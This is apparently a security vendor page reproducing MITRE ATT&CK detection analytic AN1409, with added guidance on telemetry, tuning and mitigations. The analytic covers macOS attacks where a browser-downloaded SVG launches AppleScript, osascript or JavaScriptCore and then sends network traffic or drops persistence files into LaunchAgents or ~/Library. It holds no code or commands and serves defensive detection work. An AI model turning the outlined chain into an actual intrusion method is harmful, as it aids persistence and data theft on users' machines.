Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN1409: Analytic 1409

Detects SVGs downloaded via browser that invoke AppleScript, osascript, or JavaScriptCore processes, followed by network egress or file drop to LaunchAgents or ~/Library.

EnterpriseAN1409AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN1409 is a macOS detection analytic focused on a suspicious chain: a browser-downloaded SVG leading to AppleScript, osascript, or JavaScriptCore execution, followed by network activity or file placement in persistence-relevant user library locations. For leaders, the practical value is validating whether macOS endpoint, browser download, process, file, and network telemetry can connect these events into one investigation story rather than treating them as isolated alerts.

Executive priority

Prioritize this analytic where macOS endpoints are material to business operations, executive workstations, developer environments, or regulated workflows. The decision value is not just detecting a file type; it is proving the organization can identify suspicious script execution originating from web content and quickly determine whether follow-on activity created persistence or external communication. This supports incident triage, audit evidence for endpoint monitoring, and control prioritization around macOS visibility and browser-delivered threats.

Technical view

SOC and detection teams should validate correlation across macOS browser download events, SVG file metadata or download paths, child or near-time execution of AppleScript, osascript, or JavaScriptCore-related processes, and subsequent network egress or file writes to LaunchAgents or user Library paths. Because the official object provides no detection logic and no tactic mapping, teams should treat AN1409 as a behavior pattern to operationalize locally, with attention to event timing, parent-child process context, user context, and whether observed LaunchAgents or ~/Library writes are expected software behavior.

Likely telemetry

  • macOS endpoint process creation telemetry, including parent-child process relationships
  • Browser download telemetry or endpoint file creation records identifying SVG files downloaded via browser
  • Command-line or script execution metadata for AppleScript, osascript, and JavaScriptCore-related processes
  • Network connection or egress telemetry tied back to endpoint process context
  • File creation or modification events in LaunchAgents and ~/Library paths

Detection direction

  • Validate that telemetry can correlate browser-downloaded SVG files to subsequent script interpreter or JavaScriptCore process execution on macOS.
  • Tune detections around sequence and proximity: download, script-related execution, then network egress or file drop to LaunchAgents or ~/Library.
  • Review benign macOS software, browser extensions, developer tools, and administrative scripts that may legitimately use osascript or write under ~/Library to reduce false positives.
  • Prioritize alerts where script execution has a browser lineage, unusual command-line context, new or unsigned files, unexpected network destinations, or writes to LaunchAgents.
  • Identify blind spots where browser downloads are not logged, process command lines are missing, network telemetry is not process-attributed, or user Library file writes are not collected.

Mitigation priorities

  • Ensure macOS endpoint monitoring captures process, file, browser download, and network evidence needed to support this analytic.
  • Harden and monitor script execution paths relevant to AppleScript, osascript, and JavaScriptCore according to organizational policy.
  • Review controls and change management around LaunchAgents and user Library persistence locations.
  • Use incident response playbooks that preserve downloaded files, process lineage, file-drop locations, and network indicators for rapid scoping.
  • Use this analytic as validation evidence for macOS endpoint visibility and managed detection readiness rather than assuming coverage from generic malware controls.
Analyst notes and limits

The supplied ATT&CK object is a detection analytic, not a technique, and no relationships, tactic mapping, or formal detection logic were provided. The strongest use is as a validation pattern for macOS detection engineering and SOC triage around browser-originated script execution followed by egress or persistence-relevant file activity.

This take is limited to the official STIX fields, the MITRE external reference, and the supplied description. It does not establish adversary attribution, active exploitation, impact, prevalence, or guaranteed detection. Local baselines are required to distinguish benign macOS automation and software behavior from suspicious activity.

Official MITRE ATT&CK definition

Analytic 1409

Detects SVGs downloaded via browser that invoke AppleScript, osascript, or JavaScriptCore processes, followed by network egress or file drop to LaunchAgents or ~/Library.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
fdc124840e2f5b12...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle fdc124840e2f…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN1409
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use